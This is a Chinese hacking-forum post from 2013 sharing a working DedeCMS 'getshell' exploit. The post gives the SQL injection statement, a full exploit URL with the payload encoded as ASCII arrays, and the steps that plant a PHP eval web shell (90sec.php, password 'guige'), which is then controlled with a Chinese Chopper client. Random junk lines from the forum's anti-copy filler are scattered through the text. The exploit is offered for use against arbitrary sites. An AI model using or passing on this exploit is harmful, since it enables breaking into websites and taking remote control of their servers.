中国网络渗透测试联盟
标题:
dedecms漏洞getshell EXP最新
[打印本页]
作者:
admin
时间:
2013-6-10 16:49
标题:
dedecms漏洞getshell EXP最新
本帖最后由 土豆 于 2013-6-10 14:41 编辑
9 a0 y1 M1 @5 c7 V2 S
4 n7 s( d1 H/ F7 y5 I9 u9 t
: k) G. w' K- p2 I9 _+ E1 ^. b1 `
作者:鬼哥
T; t' J/ {0 g% w X4 D6 k
! r6 ^. f5 l- h& R$ m R
看贴不回,没JJ
& {/ ~" R" ?6 k: y6 ^' X
1 i- d& L0 V, v2 O- S' l
漏洞大家都知道是哪个。
3 Q3 v6 i( s# _/ T0 `6 P6 O ?
6 d2 p" S: b" @0 E; g3 q
其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。
; k! C" a3 O+ @2 a) t, d( d
& A- C& s, @7 `; |, a. }0 D
但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。
. f2 J& ?4 [' v- Q
6 ` p" O7 v9 H
刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?
7 c$ _" O. Q3 e) ]' i
4 [& F3 o: W3 |( q" W; u
getshell 很容易 。 既然刚发出来的是 sql方法getshell 我也看到几个人发了sql增加表mytag的内容。
* h7 w) X; I1 `" [3 u A
; Z% P4 O; X* [3 k7 e; O
但是测试了下。。失败
% B4 C1 E' d0 Z6 `
/ [( `: k! e4 P: g* b$ y" X5 u' v
原因: 用的语句是update 很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴 错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。
. ~# l7 H! I- M: J" [
4 K. E0 f$ q$ R- V3 Y3 j
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`
, a7 k8 I, } n x8 B& s4 p
' g, ? O; O. @, D4 |
EXP:
x3 |, E6 v: W/ f, c% s( }! U* A
/ ?' g& p' p" G
http://www.xxx.com/plus/download.php?open=1&arrs1
[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
" l" u: f' V, G- D
. B* D1 q; q; m' `
8 c& x, P2 E' j9 ?
成功增加。
) r" O$ o1 S- Z0 x% z c0 l6 J: J# }
: S# u, u5 d6 u! q
访问
http://www.xxx.com/plus/mytag_js.php?aid=9013
5 E6 {: ^& f9 ]# V7 E9 `3 b
生成一句话木马.
! `, q6 u$ Z5 ^) q, j0 ]
菜刀连接
http://www.xxx.com/plus/90sec.php
密码 guige
/ u, C6 A$ `$ y
/ o( I# D% F6 B# h
测试OK。
/ m/ q- Z3 o, U0 j- p; c' n
! a1 H" w2 R3 [8 n8 q
) _9 Z! D& P7 M/ E3 w5 ]4 B
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2